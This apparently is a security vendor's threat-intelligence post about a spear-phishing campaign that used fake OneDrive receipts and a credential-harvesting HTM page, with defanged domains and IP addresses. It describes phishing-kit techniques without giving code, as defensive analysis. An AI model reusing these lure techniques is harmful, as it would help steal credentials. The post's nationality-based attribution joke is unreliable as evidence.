The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations encompassing a varying array of industries from Financial, Automotive, Technology, and Defense Contractors.

The samples utilize many common Business Email Compromise traits. The From is masked to look like it is coming from within the company, there is an attachment of a

targeted-spear-phishing_image-feature
“receipt”, and the Subject denoting that a file is being received. The bad actor went further and attempted to mask it as a Microsoft Office 365 automated email by putting in the Body of the message “Sent Via Microsoft OneDrive”.
targeted-spear-phishing_image-feature
The GoSecure Titan Inbox Detection and Response (IDR) team recently discovered yet another targeted spear-phishing campaign. The campaign targeted over 150 organizations encompassing a varying array of industries from Financial, Automotive, Technology, and Defense Contractors.

The samples utilize many common Business Email Compromise traits. The From is masked to look like it is coming from within the company, there is an attachment of a “receipt”, and the Subject denoting that a file is being received. The bad actor went further and attempted to mask it as a Microsoft Office 365 automated email by putting in the Body of the message “Sent Via Microsoft OneDrive”.

targeted-spear-phishing_image-1
Upon examination of the attachment, it opens the browser and shows a “Secured Document” page prompting the user to log in to view the file. The page looks similar to that of many digital signature sites.
targeted-spear-phishing_image-2
Here is where it gets interesting. Investigating further, we find that the targeted user’s email address and company name are hardcoded into the HTM file. This hardcoding indicates that each attack was uniquely generated to target specific users within their respective organizations.

Further analysis showed that the credentials entered would be sent to hxxps://tradershost[.]com/REDACTED/send.php:

targeted-spear-phishing_image-3
When visiting this page, the browser displays a JSON reply of {“msg”:”empty”} which indicates this phishing kit has its own API. Removing send.php from the URL returns a directory index that lists other pages in the kit. This novice or possibly lazy move of not turning off the directory index display helped in the investigation. One of the pages hosted was marked “admin@paperfoxla.com.txt”. This file appears to be the ‘database’ file of all the usernames and passwords collected so far by this campaign.

GoSecure Titan IDR analyst investigation discovered the Tradershost[.]com website is hosted on an Apache server and appeared to be solely for the use of malicious activity. The content of the website was a PHP web application masked to look like a Stock Trading company.

targeted-spear-phishing_image-4
targeted-spear-phishing_image-5
Through all our research, one thing, in particular, stood out. In the credential files was a name that was taking claim for the spear phishing:
– by *DH4 VIP3R L337 –
Searching for that name on Google revealed multiple websites which contained the same string. One such website was “viperserver11[.]xyz” and included copies of the same phishing kit. These kits, however, appeared to be testing the bad actor’s phishing kit.

GoSecure Titan IDR analysts discovered another website, “uswidefiinancial[.]com”, which appeared to be another hosted phishing campaign.

targeted-spear-phishing_image-6
Our investigation identified one possible slip-up by the bad actor. On the testing that the bad actor did, the same IP addresses showed up. The first IP address, 45.41.180.81, was used by a consumer VPN provider. However (and noted in the above picture), a second address was found. That address, 105.161.23.111, was owned by Safaricom Limited, an ISP in Nairobi, Kenya.

Wrapping up our investigation, we were able to find the bad actor’s name as a YouTube channel. While activity was limited to a single upload from 2016, it is a video from the country we all know when it comes to spam and phishing, Nigeria. Just maybe our Nigerian Prince friend finally ran out of money and changed his occupation.

Using Privacy as a Shield

The bad actor used products and services commonly used to host websites, email, and e-commerce safely, securely, and privately. For example, many hosting companies, including NameCheap, have a service that provides privacy on the WHOIS of a domain. For most, this helps small companies and individuals not to be bombarded with emails and phone calls telling them they can make you the most amazing website or try and push services that are not necessarily needed. However, in the hands of a bad actor, this allows them to mask the information that could help track them down.

All three domains “viperserver11[.]xyz”, “tradershost[.]com”, and “uswidefiinancial[.]com” were masked behind these services to make it harder to gather information. “viperserver11[.]xyz” was utilizing Cloudflare, so the IP address of the server running the site could not be easily discovered. The other two were registered and hosted with NameCheap, a registrar who has a very strict policy of privacy.

Final Thought

The organizations targeted by the campaign come in all sizes, including some very well-known Fortune 500 and Government organizations. It’s comforting to believe that, given the size and cybersecurity budget, some of these organizations are protected from such attacks. As this campaign illustrates, cybercriminals continue to find ways to bypass traditional email gateway solutions, leaving imperfect humans as the organization’s final line of defense. By the time GoSecure Titan IDR analysts discovered the primary server behind this attack, the cybercriminals had already collected 211 unique usernames and passwords from 159 different organizations. Imperfect humans indeed.
Détection et réponse gérées Titan
Antivirus de nouvelle génération
Détection et réponse sur les terminaux
Détection et réponse sur le réseau
Détection et réponse sur les boîtes de messagerie
Détection et réponse face aux menaces internes
Gestion des pare-feu
Gestion des SIEM
La gestion des vulnérabilités en tant que service
GoSecure Titan
Logiciel Titan
Sécurité de la messagerie
Sécurité Web
Boîte à outils «Responder PRO Forensics»
Services professionnels
Services de détection de brèches
Évaluation de la cybersécurité
Évaluation de la compromission de la sécurité
Piratage éthique
Réponse aux incidents et analyse de type «forensics»
Services de conformité et d’audit
Technologies fournies par des tiers

Pin It on Pinterest

Share This